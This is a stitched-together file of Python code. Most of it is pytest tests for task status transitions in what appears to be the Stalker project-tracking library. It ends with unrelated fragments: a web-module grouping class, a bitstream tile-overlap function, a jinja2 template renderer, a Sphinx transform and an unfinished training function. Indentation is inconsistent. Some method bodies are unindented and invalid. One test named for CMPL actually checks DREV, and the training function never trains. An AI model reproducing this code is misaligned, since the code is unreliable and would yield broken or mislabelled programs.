    assert (len(self.test_task3.time_logs) == 0)
    now = datetime.datetime.now(pytz.utc)
    tl = self.test_task3.create_time_log(resource=self.test_task3.resources[0], start=now, end=(now + datetime.timedelta(hours=1)))
    from stalker import TimeLog
    assert isinstance(tl, TimeLog)
def test_request_review_in_WFD_leaf_task(self):
    """request_review() on a WFD leaf task raises StatusError."""
    self.test_task3.status = self.status_wfd
    # pin the id so the expected error message is deterministic
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.request_review()
    assert (str(cm.value) == 'Test Task 3 (id:37) is a WFD task, and WFD tasks are not suitable for requesting a review, please supply a WIP task instead.')
def test_request_review_in_RTS_leaf_task(self):
    """request_review() on an RTS leaf task raises StatusError."""
    self.test_task3.status = self.status_rts
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.request_review()
    assert (str(cm.value) == 'Test Task 3 (id:37) is a RTS task, and RTS tasks are not suitable for requesting a review, please supply a WIP task instead.')
def test_request_review_in_PREV_leaf_task(self):
    """request_review() on a PREV leaf task raises StatusError."""
    self.test_task3.status = self.status_prev
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.request_review()
    assert (str(cm.value) == 'Test Task 3 (id:37) is a PREV task, and PREV tasks are not suitable for requesting a review, please supply a WIP task instead.')
def test_request_review_in_HREV_leaf_task(self):
    """request_review() on an HREV leaf task raises StatusError."""
    self.test_task3.status = self.status_hrev
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.request_review()
    assert (str(cm.value) == 'Test Task 3 (id:37) is a HREV task, and HREV tasks are not suitable for requesting a review, please supply a WIP task instead.')
def test_request_review_in_DREV_leaf_task(self):
    """request_review() on a DREV leaf task raises StatusError."""
    self.test_task3.status = self.status_drev
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.request_review()
    assert (str(cm.value) == 'Test Task 3 (id:37) is a DREV task, and DREV tasks are not suitable for requesting a review, please supply a WIP task instead.')
def test_request_review_in_OH_leaf_task(self):
    """request_review() on an OH leaf task raises StatusError."""
    self.test_task3.status = self.status_oh
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.request_review()
    assert (str(cm.value) == 'Test Task 3 (id:37) is a OH task, and OH tasks are not suitable for requesting a review, please supply a WIP task instead.')
def test_request_review_in_STOP_leaf_task(self):
    """request_review() on a STOP leaf task raises StatusError."""
    self.test_task3.status = self.status_stop
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.request_review()
    assert (str(cm.value) == 'Test Task 3 (id:37) is a STOP task, and STOP tasks are not suitable for requesting a review, please supply a WIP task instead.')
def test_request_review_in_CMPL_leaf_task(self):
    """request_review() on a CMPL leaf task raises StatusError."""
    self.test_task3.status = self.status_cmpl
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.request_review()
    assert (str(cm.value) == 'Test Task 3 (id:37) is a CMPL task, and CMPL tasks are not suitable for requesting a review, please supply a WIP task instead.')
def test_request_revision_in_WFD_leaf_task(self):
    """request_revision() on a WFD leaf task raises StatusError."""
    self.test_task3.status = self.status_wfd
    # pin the id so the expected error message is deterministic
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.request_revision()
    assert (str(cm.value) == 'Test Task 3 (id: 37) is a WFD task, and it is not suitable for requesting a revision, please supply a PREV or CMPL task')
def test_request_revision_in_RTS_leaf_task(self):
    """request_revision() on an RTS leaf task raises StatusError."""
    self.test_task3.status = self.status_rts
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.request_revision()
    assert (str(cm.value) == 'Test Task 3 (id: 37) is a RTS task, and it is not suitable for requesting a revision, please supply a PREV or CMPL task')
def test_request_revision_in_WIP_leaf_task(self):
    """request_revision() on a WIP leaf task raises StatusError."""
    self.test_task3.status = self.status_wip
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.request_revision()
    assert (str(cm.value) == 'Test Task 3 (id: 37) is a WIP task, and it is not suitable for requesting a revision, please supply a PREV or CMPL task')
def test_request_revision_in_HREV_leaf_task(self):
    """request_revision() on an HREV leaf task raises StatusError even with full kwargs."""
    self.test_task3.status = self.status_hrev
    self.test_task3.id = 37
    kw = {'reviewer': self.test_user1, 'description': 'do something uleyn', 'schedule_timing': 4, 'schedule_unit': 'h'}
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.request_revision(**kw)
    assert (str(cm.value) == 'Test Task 3 (id: 37) is a HREV task, and it is not suitable for requesting a revision, please supply a PREV or CMPL task')
def test_request_revision_in_OH_leaf_task(self):
    """request_revision() on an OH leaf task raises StatusError even with full kwargs."""
    self.test_task3.status = self.status_oh
    self.test_task3.id = 37
    kw = {'reviewer': self.test_user1, 'description': 'do something uleyn', 'schedule_timing': 4, 'schedule_unit': 'h'}
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.request_revision(**kw)
    assert (str(cm.value) == 'Test Task 3 (id: 37) is a OH task, and it is not suitable for requesting a revision, please supply a PREV or CMPL task')
def test_request_revision_in_STOP_leaf_task(self):
    """request_revision() on a STOP leaf task raises StatusError even with full kwargs."""
    self.test_task3.status = self.status_stop
    self.test_task3.id = 37
    kw = {'reviewer': self.test_user1, 'description': 'do something uleyn', 'schedule_timing': 4, 'schedule_unit': 'h'}
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.request_revision(**kw)
    assert (str(cm.value) == 'Test Task 3 (id: 37) is a STOP task, and it is not suitable for requesting a revision, please supply a PREV or CMPL task')
def test_hold_in_WFD_leaf_task(self):
    """hold() on a WFD leaf task raises StatusError."""
    self.test_task3.status = self.status_wfd
    # pin the id so the expected error message is deterministic
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.hold()
    assert (str(cm.value) == 'Test Task 3 (id:37) is a WFD task, only WIP or DREV tasks can be set to On Hold')
def test_hold_in_RTS_leaf_task(self):
    """hold() on an RTS leaf task raises StatusError."""
    self.test_task3.status = self.status_rts
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.hold()
    assert (str(cm.value) == 'Test Task 3 (id:37) is a RTS task, only WIP or DREV tasks can be set to On Hold')
def test_hold_in_WIP_leaf_task_status(self):
    """hold() on a WIP leaf task sets the status to OH."""
    self.test_task3.status = self.status_wip
    self.test_task3.hold()
    assert (self.test_task3.status == self.status_oh)
def test_hold_in_WIP_leaf_task_schedule_values(self):
    """hold() on a WIP leaf task leaves schedule_timing/schedule_unit untouched."""
    self.test_task3.status = self.status_wip
    self.test_task3.hold()
    # fixture values from setup: 10 days
    assert (self.test_task3.schedule_timing == 10)
    assert (self.test_task3.schedule_unit == 'd')
def test_hold_in_WIP_leaf_task(self):
    """hold() on a WIP leaf task drops the priority to 0."""
    self.test_task3.status = self.status_wip
    self.test_task3.hold()
    assert (self.test_task3.priority == 0)
def test_hold_in_PREV_leaf_task(self):
    """hold() on a PREV leaf task raises StatusError."""
    self.test_task3.status = self.status_prev
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.hold()
    assert (str(cm.value) == 'Test Task 3 (id:37) is a PREV task, only WIP or DREV tasks can be set to On Hold')
def test_hold_in_HREV_leaf_task(self):
    """hold() on an HREV leaf task raises StatusError."""
    self.test_task3.status = self.status_hrev
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.hold()
    assert (str(cm.value) == 'Test Task 3 (id:37) is a HREV task, only WIP or DREV tasks can be set to On Hold')
def test_hold_in_DREV_leaf_task_status_updated_to_OH(self):
    """hold() on a DREV leaf task sets the status to OH."""
    self.test_task3.status = self.status_drev
    self.test_task3.hold()
    assert (self.test_task3.status == self.status_oh)
def test_hold_in_DREV_leaf_task_schedule_values_are_intact(self):
    """hold() on a DREV leaf task leaves schedule_timing/schedule_unit untouched."""
    self.test_task3.status = self.status_drev
    self.test_task3.hold()
    # fixture values from setup: 10 days
    assert (self.test_task3.schedule_timing == 10)
    assert (self.test_task3.schedule_unit == 'd')
def test_hold_in_DREV_leaf_task_priority_set_to_0(self):
    """hold() on a DREV leaf task drops the priority to 0."""
    self.test_task3.status = self.status_drev
    self.test_task3.hold()
    assert (self.test_task3.priority == 0)
def test_hold_in_OH_leaf_task(self):
    """hold() on an already-OH leaf task is a no-op (status stays OH, no error)."""
    self.test_task3.status = self.status_oh
    self.test_task3.hold()
    assert (self.test_task3.status == self.status_oh)
def test_hold_in_STOP_leaf_task(self):
    """hold() on a STOP leaf task raises StatusError."""
    self.test_task3.status = self.status_stop
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.hold()
    assert (str(cm.value) == 'Test Task 3 (id:37) is a STOP task, only WIP or DREV tasks can be set to On Hold')
def test_hold_in_CMPL_leaf_task(self):
    """hold() on a CMPL leaf task raises StatusError."""
    self.test_task3.status = self.status_cmpl
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.hold()
    assert (str(cm.value) == 'Test Task 3 (id:37) is a CMPL task, only WIP or DREV tasks can be set to On Hold')
def test_stop_in_WFD_leaf_task(self):
    """stop() on a WFD leaf task raises StatusError."""
    self.test_task3.status = self.status_wfd
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.stop()
    # NOTE(review): the expected message lacks a space after ')' —
    # this mirrors the production wording; do not "fix" it here alone.
    assert (str(cm.value) == 'Test Task 3 (id:37)is a WFD task and it is not possible to stop a WFD task.')
def test_stop_in_RTS_leaf_task(self):
    """stop() on an RTS leaf task raises StatusError."""
    self.test_task3.status = self.status_rts
    self.test_task3.id = 37
    from stalker.exceptions import StatusError
    with pytest.raises(StatusError) as cm:
        self.test_task3.stop()
    assert (str(cm.value) == 'Test Task 3 (id:37)is a RTS task and it is not possible to stop a RTS task.')
def test_stop_in_WIP_leaf_task_status_is_updated_to_STOP(self):
    """stop() on a WIP leaf task sets the status to STOP.

    Fix: the original body called hold() and asserted OH — a copy-paste
    of test_hold_in_WIP_leaf_task_status — so the behavior named by this
    test (stop() -> STOP) was never exercised.
    """
    self.test_task3.status = self.status_wip
    self.test_task3.stop()
    assert (self.test_task3.status == self.status_stop)
def test_stop_in_WIP_leaf_task_schedule_values_clamped(self):
    """stop() clamps schedule_timing/unit down to the total logged time (2 hours here)."""
    dt = datetime.datetime
    td = datetime.timedelta
    now = dt.now(pytz.utc)
    self.test_task8.status = self.status_rts
    from stalker import TimeLog
    # two consecutive one-hour logs -> 2h total
    TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=now, end=(now + td(hours=1)))
    TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=(now + td(hours=1)), end=(now + td(hours=2)))
    self.test_task8.status = self.status_wip
    self.test_task8.stop()
    assert (self.test_task8.schedule_timing == 2)
    assert (self.test_task8.schedule_unit == 'h')
def test_stop_in_WIP_leaf_task_dependent_task_status_updated_from_WFD_to_RTS(self):
    """Stopping a WIP task releases its dependents: task9 goes WFD -> RTS."""
    dt = datetime.datetime
    td = datetime.timedelta
    now = dt.now(pytz.utc)
    self.test_task9.status = self.status_rts
    self.test_task8.status = self.status_rts
    # task9 now waits on task8
    self.test_task9.depends = [self.test_task8]
    from stalker import TimeLog
    TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=now, end=(now + td(hours=1)))
    TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=(now + td(hours=1)), end=(now + td(hours=2)))
    self.test_task8.status = self.status_wip
    self.test_task8.stop()
    assert (self.test_task9.status == self.status_rts)
def test_stop_in_WIP_leaf_task_status_from_DREV_to_HREV(self):
    """Stopping the revised dependency (task8) moves the dependent DREV task (task9) to HREV."""
    dt = datetime.datetime
    td = datetime.timedelta
    now = dt.now(pytz.utc)
    self.test_task9.status = self.status_rts
    self.test_task8.status = self.status_cmpl
    self.test_task9.depends = [self.test_task8]
    from stalker import TimeLog
    TimeLog(task=self.test_task9, resource=self.test_task9.resources[0], start=now, end=(now + td(hours=1)))
    TimeLog(task=self.test_task9, resource=self.test_task9.resources[0], start=(now + td(hours=1)), end=(now + td(hours=2)))
    self.test_task9.status = self.status_wip
    # task8 gets revised, which drags the working task9 to DREV
    self.test_task8.status = self.status_hrev
    self.test_task9.status = self.status_drev
    TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=(now + td(hours=2)), end=(now + td(hours=3)))
    TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=(now + td(hours=4)), end=(now + td(hours=5)))
    self.test_task8.status = self.status_wip
    self.test_task8.stop()
    assert (self.test_task9.status == self.status_hrev)
    def test_stop_in_DREV_leaf_task_check_parent_status(self):
        """Stopping a DREV leaf task sets it to STOP and lets its parent complete."""
        dt = datetime.datetime
        td = datetime.timedelta
        now = dt.now(pytz.utc)
        from stalker import TimeLog
        TimeLog(task=self.test_task9, resource=self.test_task9.resources[0], start=now, end=(now + td(hours=1)))
        # NOTE(review): this log is created on test_task8 but with a resource
        # taken from test_task9 — possibly intentional, but it mirrors the
        # previous line suspiciously closely; confirm.
        TimeLog(task=self.test_task8, resource=self.test_task9.resources[0], start=(now + td(hours=1)), end=(now + td(hours=2)))
        self.test_task9.status = self.status_drev
        self.test_task9.stop()
        assert (self.test_task9.status == self.status_stop)
        assert (self.test_asset1.status == self.status_cmpl)
    def test_stop_in_PREV_leaf_task(self):
        """Stopping a PREV leaf task must raise a StatusError."""
        self.test_task3.status = self.status_prev
        # Fixed id so the expected error message below is deterministic.
        self.test_task3.id = 37
        from stalker.exceptions import StatusError
        with pytest.raises(StatusError) as cm:
            self.test_task3.stop()
        assert (str(cm.value) == 'Test Task 3 (id:37)is a PREV task and it is not possible to stop a PREV task.')

    def test_stop_in_HREV_leaf_task(self):
        """Stopping an HREV leaf task must raise a StatusError."""
        self.test_task3.status = self.status_hrev
        self.test_task3.id = 37
        from stalker.exceptions import StatusError
        with pytest.raises(StatusError) as cm:
            self.test_task3.stop()
        assert (str(cm.value) == 'Test Task 3 (id:37)is a HREV task and it is not possible to stop a HREV task.')
    def test_stop_in_DREV_leaf_task_status_is_updated_to_STOP(self):
        """Stopping a DREV leaf task must set its status to STOP."""
        self.test_task3.status = self.status_drev
        self.test_task3.stop()
        assert (self.test_task3.status == self.status_stop)

    def test_stop_in_DREV_leaf_task_schedule_values_are_clamped(self):
        """Stopping a DREV leaf task clamps its schedule values to the logged effort (4h here)."""
        dt = datetime.datetime
        td = datetime.timedelta
        now = dt.now(pytz.utc)
        self.test_task8.status = self.status_rts
        from stalker import TimeLog
        # Two contiguous 2h time logs -> 4h total logged effort.
        TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=now, end=(now + td(hours=2)))
        TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=(now + td(hours=2)), end=(now + td(hours=4)))
        self.test_task8.status = self.status_drev
        self.test_task8.stop()
        assert (self.test_task8.schedule_timing == 4)
        assert (self.test_task8.schedule_unit == 'h')
def test_stop_in_DREV_leaf_task_parent_status(self):
dt = datetime.datetime
td = datetime.timedelta
now = dt.now(pytz.utc)
from stalker import TimeLog
TimeLog(task=self.test_task9, resource=self.test_task9.resources[0], start=now, end=(now + td(hours=1)))
TimeLog(task=self.test_task8, resource=self.test_task9.resources[0], start=(now + td(hours=1)), end=(now + td(hours=2)))
self.test_task9.status = self.status_wip
self.test_task9.stop()
assert (self.test_task9.status == self.status_stop)
assert (self.test_asset1.status == self.status_cmpl)
    def test_stop_in_DREV_leaf_task_dependent_task_status_updated_from_WFD_to_RTS(self):
        """Stopping the blocking task releases its WFD dependents to RTS."""
        dt = datetime.datetime
        td = datetime.timedelta
        now = dt.now(pytz.utc)
        self.test_task9.status = self.status_rts
        self.test_task8.status = self.status_rts
        # task9 depends on task8, so task9 is WFD until task8 finishes/stops.
        self.test_task9.depends = [self.test_task8]
        from stalker import TimeLog
        TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=now, end=(now + td(hours=1)))
        TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=(now + td(hours=1)), end=(now + td(hours=2)))
        self.test_task8.status = self.status_wip
        self.test_task8.stop()
        assert (self.test_task9.status == self.status_rts)

    def test_stop_in_DREV_leaf_task_dependent_task_status_updated_from_DREV_to_HREV(self):
        """Stopping the blocking task turns its DREV dependents into HREV."""
        dt = datetime.datetime
        td = datetime.timedelta
        now = dt.now(pytz.utc)
        self.test_task9.status = self.status_rts
        self.test_task8.status = self.status_rts
        self.test_task9.depends = [self.test_task8]
        self.test_task9.status = self.status_drev
        from stalker import TimeLog
        TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=now, end=(now + td(hours=1)))
        TimeLog(task=self.test_task8, resource=self.test_task8.resources[0], start=(now + td(hours=1)), end=(now + td(hours=2)))
        self.test_task8.status = self.status_wip
        self.test_task8.stop()
        assert (self.test_task9.status == self.status_hrev)
    def test_stop_in_OH_leaf_task(self):
        """Stopping an OH leaf task must raise a StatusError."""
        self.test_task3.status = self.status_oh
        # Fixed id so the expected error message below is deterministic.
        self.test_task3.id = 37
        from stalker.exceptions import StatusError
        with pytest.raises(StatusError) as cm:
            self.test_task3.stop()
        assert (str(cm.value) == 'Test Task 3 (id:37)is a OH task and it is not possible to stop a OH task.')

    def test_stop_in_STOP_leaf_task(self):
        """Stopping an already-stopped task is a no-op (still STOP, no error)."""
        self.test_task3.status = self.status_stop
        self.test_task3.stop()
        assert (self.test_task3.status == self.status_stop)

    def test_stop_in_CMPL_leaf_task(self):
        """Stopping a CMPL leaf task must raise a StatusError."""
        self.test_task3.status = self.status_cmpl
        self.test_task3.id = 37
        from stalker.exceptions import StatusError
        with pytest.raises(StatusError) as cm:
            self.test_task3.stop()
        assert (str(cm.value) == 'Test Task 3 (id:37)is a CMPL task and it is not possible to stop a CMPL task.')
    def test_resume_in_WFD_leaf_task(self):
        """Resuming a WFD leaf task must raise a StatusError (only OH/STOP can resume)."""
        self.test_task3.status = self.status_wfd
        # Fixed id so the expected error message below is deterministic.
        self.test_task3.id = 37
        from stalker.exceptions import StatusError
        with pytest.raises(StatusError) as cm:
            self.test_task3.resume()
        assert (str(cm.value) == 'Test Task 3 (id:37) is a WFD task, and it is not suitable to be resumed, please supply an OH or STOP task')

    def test_resume_in_RTS_leaf_task(self):
        """Resuming an RTS leaf task must raise a StatusError."""
        self.test_task3.status = self.status_rts
        self.test_task3.id = 37
        from stalker.exceptions import StatusError
        with pytest.raises(StatusError) as cm:
            self.test_task3.resume()
        assert (str(cm.value) == 'Test Task 3 (id:37) is a RTS task, and it is not suitable to be resumed, please supply an OH or STOP task')

    def test_resume_in_WIP_leaf_task(self):
        """Resuming a WIP leaf task must raise a StatusError."""
        self.test_task3.status = self.status_wip
        self.test_task3.id = 37
        from stalker.exceptions import StatusError
        with pytest.raises(StatusError) as cm:
            self.test_task3.resume()
        assert (str(cm.value) == 'Test Task 3 (id:37) is a WIP task, and it is not suitable to be resumed, please supply an OH or STOP task')

    def test_resume_in_PREV_leaf_task(self):
        """Resuming a PREV leaf task must raise a StatusError."""
        self.test_task3.status = self.status_prev
        self.test_task3.id = 37
        from stalker.exceptions import StatusError
        with pytest.raises(StatusError) as cm:
            self.test_task3.resume()
        assert (str(cm.value) == 'Test Task 3 (id:37) is a PREV task, and it is not suitable to be resumed, please supply an OH or STOP task')

    def test_resume_in_HREV_leaf_task(self):
        """Resuming an HREV leaf task must raise a StatusError."""
        self.test_task3.status = self.status_hrev
        self.test_task3.id = 37
        from stalker.exceptions import StatusError
        with pytest.raises(StatusError) as cm:
            self.test_task3.resume()
        assert (str(cm.value) == 'Test Task 3 (id:37) is a HREV task, and it is not suitable to be resumed, please supply an OH or STOP task')

    def test_resume_in_DREV_leaf_task(self):
        """Resuming a DREV leaf task must raise a StatusError."""
        self.test_task3.status = self.status_drev
        self.test_task3.id = 37
        from stalker.exceptions import StatusError
        with pytest.raises(StatusError) as cm:
            self.test_task3.resume()
        assert (str(cm.value) == 'Test Task 3 (id:37) is a DREV task, and it is not suitable to be resumed, please supply an OH or STOP task')
    def test_resume_in_OH_leaf_task_with_no_dependencies(self):
        """Resuming an OH task with no dependencies resets it to RTS."""
        self.test_task3.status = self.status_oh
        self.test_task3.depends = []
        self.test_task3.resume()
        assert (self.test_task3.status == self.status_rts)

    def test_resume_in_OH_leaf_task_with_STOP_dependencies(self):
        """Resuming an OH task whose dependency is STOP puts it to WIP."""
        self.test_task3.status = self.status_rts
        self.test_task9.status = self.status_rts
        self.test_task9.depends = [self.test_task3]
        self.test_task3.status = self.status_stop
        self.test_task9.status = self.status_oh
        self.test_task9.resume()
        assert (self.test_task9.status == self.status_wip)

    def test_resume_in_OH_leaf_task_with_CMPL_dependencies(self):
        """Resuming an OH task whose dependency is CMPL puts it to WIP."""
        self.test_task3.status = self.status_rts
        self.test_task9.status = self.status_rts
        self.test_task9.depends = [self.test_task3]
        self.test_task3.status = self.status_cmpl
        self.test_task9.status = self.status_oh
        self.test_task9.resume()
        assert (self.test_task9.status == self.status_wip)

    def test_resume_in_STOP_leaf_task_with_no_dependencies(self):
        """Resuming a STOP task with no dependencies resets it to RTS."""
        self.test_task3.status = self.status_stop
        self.test_task3.depends = []
        self.test_task3.resume()
        assert (self.test_task3.status == self.status_rts)

    def test_resume_in_STOP_leaf_task_with_STOP_dependencies(self):
        """Resuming a STOP task whose dependency is STOP puts it to WIP."""
        self.test_task3.status = self.status_rts
        self.test_task9.status = self.status_rts
        self.test_task9.depends = [self.test_task3]
        self.test_task3.status = self.status_stop
        self.test_task9.status = self.status_stop
        self.test_task9.resume()
        assert (self.test_task9.status == self.status_wip)

    def test_resume_in_STOP_leaf_task_with_CMPL_dependencies(self):
        """Resuming a STOP task whose dependency is CMPL puts it to WIP."""
        self.test_task3.status = self.status_rts
        self.test_task9.status = self.status_rts
        self.test_task9.depends = [self.test_task3]
        self.test_task3.status = self.status_cmpl
        self.test_task9.status = self.status_stop
        self.test_task9.resume()
        assert (self.test_task9.status == self.status_wip)
def test_resume_in_CMPL_leaf_task(self):
self.test_task3.status = self.status_drev
self.test_task3.id = 37
from stalker.exceptions import StatusError
with pytest.raises(StatusError) as cm:
self.test_task3.resume()
assert (str(cm.value) == 'Test Task 3 (id:37) is a DREV task, and it is not suitable to be resumed, please supply an OH or STOP task')
    def test_review_set_review_number_is_not_an_integer(self):
        """review_set() rejects a non-integer review_number."""
        with pytest.raises(TypeError) as cm:
            self.test_task3.review_set('not an integer')
        assert (str(cm.value) == 'review_number argument in Task.review_set should be a positive integer, not str')

    def test_review_set_review_number_is_a_negative_integer(self):
        """review_set() rejects a negative review_number."""
        with pytest.raises(TypeError) as cm:
            self.test_task3.review_set((- 10))
        assert (str(cm.value) == 'review_number argument in Task.review_set should be a positive integer, not -10')

    def test_review_set_review_number_is_zero(self):
        """review_set() rejects zero — review numbers start at 1."""
        with pytest.raises(TypeError) as cm:
            self.test_task3.review_set(0)
        assert (str(cm.value) == 'review_number argument in Task.review_set should be a positive integer, not 0')
    def test_leaf_DREV_task_with_no_dependency_and_no_timelogs_update_status_with_dependent_statuses_fixes_status(self):
        """update_status_with_dependent_statuses() repairs a bogus DREV (no deps, no logs) to RTS."""
        self.test_task5.depends = []
        self.test_task5.status = self.status_drev
        assert (self.status_drev == self.test_task5.status)
        self.test_task5.update_status_with_dependent_statuses()
        assert (self.status_rts == self.test_task5.status)

    def test_leaf_DREV_task_with_no_dependency_but_with_timelogs_update_status_with_dependent_statuses_fixes_status(self):
        """With logged time present, the repaired status is WIP instead of RTS."""
        self.test_task5.depends = []
        dt = datetime.datetime
        td = datetime.timedelta
        now = dt.now(pytz.utc)
        self.test_task5.create_time_log(resource=self.test_task5.resources[0], start=now, end=(now + td(hours=1)))
        self.test_task5.status = self.status_drev
        assert (self.status_drev == self.test_task5.status)
        self.test_task5.update_status_with_dependent_statuses()
        assert (self.status_wip == self.test_task5.status)

    def test_leaf_WIP_task_with_no_dependency_and_no_timelogs_update_status_with_dependent_statuses_fixes_status(self):
        """A WIP task without any time logs is reset back to RTS."""
        self.test_task5.depends = []
        assert (self.test_task5.time_logs == [])
        self.test_task5.status = self.status_wip
        assert (self.status_wip == self.test_task5.status)
        self.test_task5.update_status_with_dependent_statuses()
        assert (self.status_rts == self.test_task5.status)
class AppModuleGroup():
    """Bundles several AppModule instances so sub-modules, routes and
    websockets can be declared on all of them with a single call."""

    def __init__(self, *modules: AppModule):
        self.modules = modules

    def module(self, import_name: str, name: str, template_folder: Optional[str]=None, template_path: Optional[str]=None, static_folder: Optional[str]=None, static_path: Optional[str]=None, url_prefix: Optional[str]=None, hostname: Optional[str]=None, cache: Optional[RouteCacheRule]=None, root_path: Optional[str]=None, module_class: Optional[Type[AppModule]]=None, **kwargs: Any) -> AppModulesGrouped:
        """Create a nested module on every member of this group.

        Falls back to the plain AppModule class when no explicit
        ``module_class`` is supplied; extra keyword arguments are passed
        through as module options.
        """
        cls = module_class or AppModule
        return cls.from_module_group(self, import_name, name, template_folder=template_folder, template_path=template_path, static_folder=static_folder, static_path=static_path, url_prefix=url_prefix, hostname=hostname, cache=cache, root_path=root_path, opts=kwargs)

    def route(self, paths: Optional[Union[(str, List[str])]]=None, name: Optional[str]=None, template: Optional[str]=None, **kwargs) -> RoutingCtxGroup:
        """Register an HTTP route on every module of the group."""
        contexts = []
        for member in self.modules:
            contexts.append(member.route(paths=paths, name=name, template=template, **kwargs))
        return RoutingCtxGroup(contexts)

    def websocket(self, paths: Optional[Union[(str, List[str])]]=None, name: Optional[str]=None, **kwargs):
        """Register a websocket route on every module of the group."""
        contexts = []
        for member in self.modules:
            contexts.append(member.websocket(paths=paths, name=name, **kwargs))
        return RoutingCtxGroup(contexts)
def mk_segtiles(tiles):
    """For every tile, collect the (tile, block) pairs whose bit windows
    overlap one of the tile's own blocks under the same base address.

    Returns a dict mapping tile name -> list of (tile_name, block_name)
    "seglets". Relies on the external `overlap` helper for interval tests.
    """
    # Bucket every block by its base address, tagged with its word offset.
    by_baseaddr = {}
    for tname, tdata in tiles.items():
        for bname, bdata in tdata['bits'].items():
            by_baseaddr.setdefault(bdata['baseaddr'], []).append((bdata['offset'], tname, bdata, bname))

    segtiles = {}
    for entries in by_baseaddr.values():
        ordered = sorted(entries)
        for idx, (_off, tname, bdata, _bname) in enumerate(ordered):
            seglets = segtiles.setdefault(tname, [])
            lo = bdata['offset']
            span = (lo, ((lo + bdata['words']) - 1))
            for _other_off, other_tname, other_bdata, other_bname in ordered[(idx + 1):]:
                other_lo = other_bdata['offset']
                other_span = (other_lo, ((other_lo + other_bdata['words']) - 1))
                if not overlap(span, other_span):
                    # Entries are offset-sorted, so once one later block
                    # clears the window, the rest can't overlap either.
                    break
                seglets.append((other_tname, other_bname))
    return segtiles
def render_plugin(values) -> str:
    """Render the ``new_plugin.py.tmpl`` template with *values* and return the
    resulting source text.

    NOTE(review): the original return annotation was ``jinja2.Template``, but
    ``Template.render`` returns a string — the annotation is corrected here.
    NOTE(review): ``autoescape=True`` HTML-escapes substituted values, which is
    unusual when generating Python source from a ``.py.tmpl`` template —
    confirm this is intended.
    """
    template_dir = os.path.join(os.path.dirname(__file__), 'templates')
    env = jinja2.Environment(
        loader=jinja2.FileSystemLoader(template_dir),
        auto_reload=False,
        keep_trailing_newline=True,
        autoescape=True,
    )
    template = env.get_template('new_plugin.py.tmpl')
    return template.render(**values)
class DefinitionsTransform(SphinxTransform):
    """Resolve definition-id and definition-reference placeholder nodes for
    every registered definition kind, turning references into real links (or
    a ``spec-missing-ref`` inline when the target is unknown)."""

    default_priority = 500

    def apply(self):
        for kind in KINDS:
            storage = get_storage(self.env, kind)
            self._replace_id_nodes(kind, storage)
            self._replace_ref_nodes(kind, storage)

    def _replace_id_nodes(self, kind, storage):
        # Swap each DefIdNode of this kind for its rendered definition.
        for node in self.document.findall(DefIdNode):
            if (node['def_kind'] != kind.NAME):
                continue
            kind.replace_id_node(self.app, node, storage[node['def_id']])

    def _replace_ref_nodes(self, kind, storage):
        # Swap each DefRefNode of this kind for a cross-reference, or flag
        # it as missing when the target is not in storage.
        for node in self.document.findall(DefRefNode):
            if (node['ref_kind'] != kind.NAME):
                continue
            target = node['ref_target']
            if (target in storage):
                item = storage[target]
                inner = kind.create_ref_node(self.env, node['ref_text'], item)
                refnode = sphinx.util.nodes.make_refnode(self.app.builder, node['ref_source_doc'], item.document, item.anchor(), inner)
                node.replace_self(refnode)
            else:
                missing = nodes.inline('', '', kind.create_ref_node(self.env, node['ref_text'], None))
                missing['classes'].append('spec-missing-ref')
                node.replace_self(missing)
def train_model(train_file, eval_file, scale, output_dir):
    """Train an A2N model for 1000 epochs on *train_file*, evaluating against
    *eval_file*, writing checkpoints/outputs under *output_dir*.

    *scale* is the super-resolution factor shared by the augmented training
    dataset and the model configuration.
    """
    training_data = TrainAugmentDataset(train_file, scale=scale)
    validation_data = EvalDataset(eval_file)
    args = TrainingArguments(output_dir=output_dir, num_train_epochs=1000)
    model = A2nModel(A2nConfig(scale=scale))
